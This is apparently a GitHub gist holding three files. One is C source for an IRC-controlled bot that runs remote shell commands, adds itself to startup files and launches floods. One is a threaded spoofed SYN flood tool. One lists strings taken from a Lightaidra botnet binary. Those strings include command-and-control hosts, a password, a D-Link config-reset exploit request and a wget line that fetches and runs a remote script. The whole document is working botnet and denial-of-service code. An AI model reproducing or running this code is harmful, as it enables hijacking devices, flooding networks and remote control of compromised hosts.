| int i; | |
| char *to, *message; | |
| for (i=0;i<strlen(str) && str[i] != ' ';i++); | |
| str[i]=0; | |
| to=str; | |
| message=str+i+2; | |
| for (i=0;i<strlen(sender) && sender[i] != '!';i++); | |
| sender[i]=0; | |
| if (*message == '!' && !strcasecmp(to,chan)) { | |
| char *params[12], name[1024]={0}; | |
| int num_params=0, m; | |
| message++; | |
| for (i=0;i<strlen(message) && message[i] != ' ';i++); | |
| message[i]=0; | |
| if (strwildmatch(message,nick)) return; | |
| message+=i+1; | |
| if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4); | |
| if (!strncmp(message,"SH ",3)) { | |
| char buf[1024]; | |
| FILE *command; | |
| if (mfork(sender) != 0) return; | |
| memset(buf,0,1024); | |
| sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3); | |
| command=popen(buf,"r"); | |
| while(!feof(command)) { | |
| memset(buf,0,1024); | |
| fgets(buf,1024,command); | |
| Send(sock,"NOTICE %s :%s\n",sender,buf); | |
| sleep(1); | |
| } | |
| pclose(command); | |
| exit(0); | |
| } | |
| m=strlen(message); | |
| for (i=0;i<m;i++) { | |
| if (*message == ' ' || *message == 0) break; | |
| name[i]=*message; | |
| message++; | |
| } | |
| for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++; | |
| num_params++; | |
| if (num_params > 10) num_params=10; | |
| params[0]=name; | |
| params[num_params+1]="\0"; | |
| m=1; | |
| while (*message != 0) { | |
| message++; | |
| if (m >= num_params) break; | |
| for (i=0;i<strlen(message) && message[i] != ' ';i++); | |
| params[m]=(char*)malloc(i+1); | |
| strncpy(params[m],message,i); | |
| params[m][i]=0; | |
| m++; | |
| message+=i; | |
| } | |
| for (m=0; flooders[m].cmd != (char *)0; m++) { | |
| if (!strcasecmp(flooders[m].cmd,name)) { | |
| flooders[m].func(sock,sender,num_params-1,params); | |
| for (i=1;i<num_params;i++) free(params[i]); | |
| return; | |
| } | |
| } | |
| } | |
| } | |
| void _376(int sock, char *sender, char *str) { | |
| Send(sock,"MODE %s -xi\n",nick); | |
| Send(sock,"JOIN %s :%s\n",chan,key); | |
| Send(sock,"WHO %s\n",nick); | |
| } | |
| void _PING(int sock, char *sender, char *str) { | |
| Send(sock,"PONG %s\n",str); | |
| } | |
| void _352(int sock, char *sender, char *str) { | |
| int i,d; | |
| char *msg=str; | |
| struct hostent *hostm; | |
| unsigned long m; | |
| for (i=0,d=0;d<5;d++) { | |
| for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++; | |
| if (i == strlen(str)) return; | |
| } | |
| for (i=0;i<strlen(msg) && msg[i] != ' ';i++); | |
| msg[i]=0; | |
| if (!strcasecmp(msg,nick) && !spoofsm) { | |
| msg=str; | |
| for (i=0,d=0;d<3;d++) { | |
| for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++; | |
| if (i == strlen(str)) return; | |
| } | |
| for (i=0;i<strlen(msg) && msg[i] != ' ';i++); | |
| msg[i]=0; | |
| if ((m = inet_addr(msg)) == -1) { | |
| if ((hostm=gethostbyname(msg)) == NULL) { | |
| Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan); | |
| return; | |
| } | |
| memcpy((char*)&m, hostm->h_addr, hostm->h_length); | |
| } | |
| ((char*)&spoofs)[3]=((char*)&m)[0]; | |
| ((char*)&spoofs)[2]=((char*)&m)[1]; | |
| ((char*)&spoofs)[1]=((char*)&m)[2]; | |
| ((char*)&spoofs)[0]=0; | |
| spoofsm=256; | |
| } | |
| } | |
| void _433(int sock, char *sender, char *str) { | |
| free(nick); | |
| nick=makestring(); | |
| } | |
| void _NICK(int sock, char *sender, char *str) { | |
| int i; | |
| for (i=0;i<strlen(sender) && sender[i] != '!';i++); | |
| sender[i]=0; | |
| if (!strcasecmp(sender,nick)) { | |
| if (*str == ':') str++; | |
| if (nick) free(nick); | |
| nick=strdup(str); | |
| } | |
| } | |
| struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = { | |
| { "352", _352 }, | |
| { "376", _376 }, | |
| { "433", _433 }, | |
| { "422", _376 }, | |
| { "PRIVMSG", _PRIVMSG }, | |
| { "PING", _PING }, | |
| { "NICK", _NICK }, | |
| { (char *)0, (void (*)(int,char *,char *))0 } }; | |
| void con() { | |
| struct sockaddr_in srv; | |
| unsigned long ipaddr,start; | |
| int flag; | |
| struct hostent *hp; | |
| start: | |
| sock=-1; | |
| flag=1; | |
| if (changeservers == 0) server=servers[rand()%numservers]; | |
| changeservers=0; | |
| while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0); | |
| if (inet_addr(server) == 0 || inet_addr(server) == -1) { | |
| if ((hp = gethostbyname(server)) == NULL) { | |
| server=NULL; | |
| close(sock); | |
| goto start; | |
| } | |
| bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length); | |
| } | |
| else srv.sin_addr.s_addr=inet_addr(server); | |
| srv.sin_family = AF_INET; | |
| srv.sin_port = htons(5050); | |
| ioctl(sock,FIONBIO,&flag); | |
| start=time(NULL); | |
| while(time(NULL)-start < 10) { | |
| errno=0; | |
| if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) { | |
| setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0); | |
| setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0); | |
| setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0); | |
| return; | |
| } | |
| if (!(errno == EINPROGRESS ||errno == EALREADY)) break; | |
| sleep(1); | |
| } | |
| server=NULL; | |
| close(sock); | |
| goto start; | |
| } | |
| int main(int argc, char **argv) { | |
| int on,i; | |
| char cwd[256],*str; | |
| FILE *file; | |
| #ifdef STARTUP | |
| str="/etc/rc.d/rc.local"; | |
| file=fopen(str,"r"); | |
| if (file == NULL) { | |
| str="/etc/rc.conf"; | |
| file=fopen(str,"r"); | |
| } | |
| if (file != NULL) { | |
| char outfile[256], buf[1024]; | |
| int i=strlen(argv[0]), d=0; | |
| getcwd(cwd,256); | |
| if (strcmp(cwd,"/")) { | |
| while(argv[0][i] != '/') i--; | |
| sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i); | |
| while(!feof(file)) { | |
| fgets(buf,1024,file); | |
| if (!strcasecmp(buf,outfile)) d++; | |
| } | |
| if (d == 0) { | |
| FILE *out; | |
| fclose(file); | |
| out=fopen(str,"a"); | |
| if (out != NULL) { | |
| fputs(outfile,out); | |
| fclose(out); | |
| } | |
| } | |
| else fclose(file); | |
| } | |
| else fclose(file); | |
| } | |
| #endif | |
| if (fork()) exit(0); | |
| #ifdef FAKENAME | |
| strncpy(argv[0],FAKENAME,strlen(argv[0])); | |
| for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on])); | |
| #endif | |
| srand((time(NULL) ^ getpid()) + getppid()); | |
| nick=makestring(); | |
| ident=makestring(); | |
| user=makestring(); | |
| chan=CHAN; | |
| key=KEY; | |
| server=NULL; | |
| sa: | |
| #ifdef IDENT | |
| for (i=0;i<numpids;i++) { | |
| if (pids[i] != 0 && pids[i] != getpid()) { | |
| kill(pids[i],9); | |
| waitpid(pids[i],NULL,WNOHANG); | |
| } | |
| } | |
| pids=NULL; | |
| numpids=0; | |
| identd(); | |
| #endif | |
| con(); | |
| Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user); | |
| while(1) { | |
| unsigned long i; | |
| fd_set n; | |
| struct timeval tv; | |
| FD_ZERO(&n); | |
| FD_SET(sock,&n); | |
| tv.tv_sec=60*20; | |
| tv.tv_usec=0; | |
| if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa; | |
| for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) { | |
| unsigned int *newpids,on; | |
| for (on=i+1;on<numpids;on++) pids[on-1]=pids[on]; | |
| pids[on-1]=0; | |
| numpids--; | |
| newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); | |
| for (on=0;on<numpids;on++) newpids[on]=pids[on]; | |
| free(pids); | |
| pids=newpids; | |
| } | |
| if (FD_ISSET(sock,&n)) { | |
| char buf[4096], *str; | |
| int i; | |
| if ((i=recv(sock,buf,4096,0)) <= 0) goto sa; | |
| buf[i]=0; | |
| str=strtok(buf,"\n"); | |
| while(str && *str) { | |
| char name[1024], sender[1024]; | |
| filter(str); | |
| if (*str == ':') { | |
| for (i=0;i<strlen(str) && str[i] != ' ';i++); | |
| str[i]=0; | |
| strcpy(sender,str+1); | |
| strcpy(str,str+i+1); | |
| } | |
| else strcpy(sender,"*"); | |
| for (i=0;i<strlen(str) && str[i] != ' ';i++); | |
| str[i]=0; | |
| strcpy(name,str); | |
| strcpy(str,str+i+1); | |
| for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str); | |
| if (!strcasecmp(name,"ERROR")) goto sa; | |
| str=strtok((char*)NULL,"\n"); | |
| } | |
| } | |
| } | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Spoofed SYN by eKKiM | |
| Educational purpose only please. | |
| Compile with | |
| gcc syn.c -pthread | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <netinet/tcp.h> | |
| #include <netinet/ip.h> | |
| #include <pthread.h> | |
| #include <errno.h> | |
| #define THREADS 5 | |
| typedef struct pthread_param | |
| { | |
| int argc; | |
| char **argv; | |
| }; | |
| typedef struct pseudo_header | |
| { | |
| unsigned int source_address; | |
| unsigned int dest_address; | |
| unsigned char placeholder; | |
| unsigned char protocol; | |
| unsigned short tcp_length; | |
| struct tcphdr tcp; | |
| }; | |
| /* Thanks for unknown author, this saves me some time */ | |
| unsigned short csum(unsigned short *ptr,int nbytes) { | |
| register long sum; | |
| unsigned short oddbyte; | |
| register short answer; | |
| sum=0; | |
| while(nbytes>1) { | |
| sum+=*ptr++; | |
| nbytes-=2; | |
| } | |
| if(nbytes==1) { | |
| oddbyte=0; | |
| *((u_char*)&oddbyte)=*(u_char*)ptr; | |
| sum+=oddbyte; | |
| } | |
| sum = (sum>>16)+(sum & 0xffff); | |
| sum = sum + (sum>>16); | |
| answer=(short)~sum; | |
| return(answer); | |
| } | |
| int attack(int argc, char *argv[]) | |
| { | |
| int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); | |
| char packet[4096]; | |
| struct iphdr *iph = (struct iphdr *) packet; | |
| struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip)); | |
| struct sockaddr_in sin; | |
| struct pseudo_header psh; | |
| char ip[16]; | |
| sin.sin_family = AF_INET; | |
| sin.sin_port = htons(atoi(argv[2])); | |
| sin.sin_addr.s_addr = inet_addr (argv[1]); | |
| sprintf(ip, "%d.%d.%d.%d\n", rand() % 223, rand() % 255, rand() % 255, rand() % 255); | |
| memset (packet, 0, 4096); | |
| iph->ihl = 5; | |
| iph->version = 4; | |
| iph->tos = 0; | |
| iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr); | |
| iph->id = htonl (54321); | |
| iph->frag_off = 0; | |
| iph->ttl = 255; | |
| iph->protocol = IPPROTO_TCP; | |
| iph->check = 0; | |
| iph->saddr = inet_addr(ip); | |
| iph->daddr = sin.sin_addr.s_addr; | |
| iph->check = csum ((unsigned short *) packet, iph->tot_len >> 1); | |
| tcph->source = htons (1234); | |
| tcph->dest = htons (80); | |
| tcph->seq = 0; | |
| tcph->ack_seq = 0; | |
| tcph->doff = 5; | |
| tcph->fin=0; | |
| tcph->syn=1; | |
| tcph->rst=0; | |
| tcph->psh=0; | |
| tcph->ack=0; | |
| tcph->urg=0; | |
| tcph->window = htons (5840); | |
| tcph->check = 0;/* We fill this in later */ | |
| tcph->urg_ptr = 0; | |
| psh.source_address = inet_addr(ip); | |
| psh.dest_address = sin.sin_addr.s_addr; | |
| psh.placeholder = 0; | |
| psh.protocol = IPPROTO_TCP; | |
| psh.tcp_length = htons(20); | |
| memcpy(&psh.tcp , tcph , sizeof (struct tcphdr)); | |
| tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header)); | |
| //IP_HDRINCL needed for own headers | |
| int one = 1; | |
| const int *val = &one; | |
| int sockop = setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)); | |
| if (sockop < 0) | |
| { | |
| perror ("[x] Error msg: "); | |
| printf ("[x] Cannot set socket options: %i (are we r00t?)\n", errno); | |
| // exit(-1); | |
| } | |
| if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0) | |
| printf ("[x] Error sending packet\n"); | |
| close(s); | |
| return 0; | |
| } | |
| void *thread_attack(void *thread_params) | |
| { | |
| struct pthread_param *params = thread_params; | |
| while (1) | |
| attack(params->argc, params->argv); | |
| } | |
| int main (int argc, char *argv[]) | |
| { | |
| int i; | |
| printf("Spoofed SYN Attack\n"); | |
| printf(" by eKKiM\n"); | |
| printf(" for Orgy\n\n"); | |
| srand(time(0)); | |
| if (argc != 4) | |
| { | |
| printf("Usage: %s <destip> <destport> <time in seconds>\n", argv[0]); | |
| return -1; | |
| } | |
| pthread_t ssyn_attack[THREADS]; | |
| struct pthread_param params; | |
| params.argc = argc; | |
| params.argv = argv; | |
| for (i = 0; i < THREADS; i++) | |
| pthread_create( &ssyn_attack[i], NULL, thread_attack, (void*) ¶ms); | |
| printf("[*] Attacking..\n"); | |
| sleep(atoi(argv[3])); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /var/run/.lightpid | |
| %d.%d.%d.%d | |
| @gibsonhacks | |
| %s%s | |
| 72.233.89.197 | |
| %d.%d.%*s.%*s | |
| light.crabdance.com:5050 | |
| PRIVMSG %s :[error] one error in your input data, see help! | |
| PRIVMSG %s :[login] you are logged in, (%s). | |
| PRIVMSG %s :[!login] sorry, wrong authenthication password! | |
| GET /n09230945.asp HTTP/1.0 | |
| Host: automation.whatismyip.com | |
| TOPIC %s | |
| ##r00tz | |
| ->%s | |
| PASS | |
| %s %s | |
| NICK %s | |
| USER pwn localhost localhost :Lightaidra ;) | |
| Aidra?! | |
| PART %s :%s | |
| JOIN %s :%s | |
| PING 0313370 | |
| penis123 | |
| PRIVMSG %s :* | |
| PRIVMSG %s :* *** EOF | |
| :.synflood | |
| :.ngsynflood | |
| :.ackflood | |
| :.ngackflood | |
| operation | |
| QUOTE ZOMBIE | |
| QUIT :pwn! | |
| :.advscan->random | |
| :.advscan->random->b | |
| :.advscan->recursive | |
| %*s%*s%*s%*s%255[^ | |
| (NULL) | |
| PRIVMSG %s :%s | |
| PING | |
| PRIVMSG | |
| :.login | |
| :.logout | |
| :.exec | |
| :.version | |
| :.status | |
| :.help | |
| :.spoof | |
| :.advscan | |
| :.stop | |
| :.synflood-> | |
| :.ngsynflood-> | |
| :.ackflood-> | |
| :.ngackflood-> | |
| :.setchan | |
| :.join | |
| :.part | |
| :.quit | |
| PRIVMSG %s :[status] currently not working. | |
| PRIVMSG %s :[status] working on %s | |
| PRIVMSG %s :[version] lightaidra 0x2012. | |
| PRIVMSG %s :[logout] you are logged out!, (%s). | |
| PRIVMSG %s :* *** Access Commands: | |
| PRIVMSG %s :* .login <password> - login to bot's party-line | |
| PRIVMSG %s :* .logout - logout from bot's party-line | |
| PRIVMSG %s :* *** Miscs Commands | |
| PRIVMSG %s :* .exec <commands> - execute a system command | |
| PRIVMSG %s :* .version - show the current version of bot | |
| PRIVMSG %s :* .status - show the status of bot | |
| PRIVMSG %s :* .help - show this help message | |
| PRIVMSG %s :* *** Scan Commands | |
| PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you | |
| PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug | |
| PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random | |
| PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug | |
| PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random | |
| PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug | |
| PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random | |
| PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug | |
| PRIVMSG %s :* .stop - stop current operation (scan/dos) | |
| PRIVMSG %s :* *** DDos Commands: | |
| PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing, | |
| PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs | |
| PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86 | |
| PRIVMSG %s :* .spoof <ip> - set the source address ip spoof | |
| PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder | |
| PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation) | |
| PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder | |
| PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation) | |
| PRIVMSG %s :* *** IRC Commands: | |
| PRIVMSG %s :* .setchan <channel> - set new master channel | |
| PRIVMSG %s :* .join <channel> <password> - join bot in selected room | |
| PRIVMSG %s :* .part <channel> - part bot from selected room | |
| PRIVMSG %s :* .quit - kill the current process | |
| synflood packeting %s:%u (secs: %u) | |
| PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u). | |
| ngsynflood packeting %s:%u (secs: %u) | |
| PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u). | |
| ackflood packeting %s:%u (secs: %u) | |
| PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u). | |
| ngackflood packeting %s:%u (secs: %u) | |
| PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u). | |
| PRIVMSG %s :[stop] %s was stopped! | |
| PRIVMSG %s :[chan] %s setted as master channel. | |
| PRIVMSG %s :[spoof] spoofing set as random ip! | |
| PRIVMSG %s :[spoof] spoofing set as ip: %s | |
| advscan scanning range %s.%s.0.0/16 (user:%s pass:%s) | |
| advscan scanning range %s.%s.0.0/16 | |
| PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait.. | |
| PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait.. | |
| PRIVMSG %s :[error] unable to get local ip, switching to random scan.. | |
| PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait.. | |
| PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait.. | |
| PRIVMSG %s :[!exec] error on command: %s | |
| PRIVMSG %s :[exec] result of "%s": | |
| %127s%31s%31s%31s%31s%31s%31s%31s | |
| PRIVMSG %s :[block] already working on %s | |
| POST /cgi-bin/firmwarecfg HTTP/1.1 | |
| Host: $IP | |
| User-Agent: veryprivateacsor | |
| Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 | |
| Accept-Language: en-us,en;q=0.5 | |
| Accept-Encoding: gzip,deflate | |
| Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 | |
| Keep-Alive: 300 | |
| Connection: keep-alive | |
| Content-Type: multipart/form-data; | |
| boundary=---------------------------41184676334 | |
| Content-Length: 234 | |
| -----------------------------41184676334 | |
| Content-Disposition: form-data; name="config.x" | |
| -----------------------------41184676334 | |
| Content-Disposition: form-data; name="config.y" | |
| -----------------------------41184676334-- | |
| http://184.106.181.149/html/aidra | |
| rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh& | |
| PRIVMSG %s :[error] unable to open: %s | |
| PRIVMSG %s :[crash] scanner has crashed, continuing to pwning.. | |
| PRIVMSG %s :[advscan] scanner completed, founds %d ips.. | |
| PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time.. | |
| PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password! | |
| PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request! | |
| password> | |
| password | |
| root | |
| /var/run/.lightscan | |
| %s.%s.%d.%d | |
| %16s | |
| PRIVMSG %s :[ngackflood] packeting completed! | |
| PRIVMSG %s :[ackflood] packeting completed! | |
| PRIVMSG %s :[ngsynflood] packeting completed! | |
| PRIVMSG %s :[nsynflood] packeting completed! |
nice lightaidra botnet code :)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3rd items is interesting strings from x86_64 executable found in same dir as source code.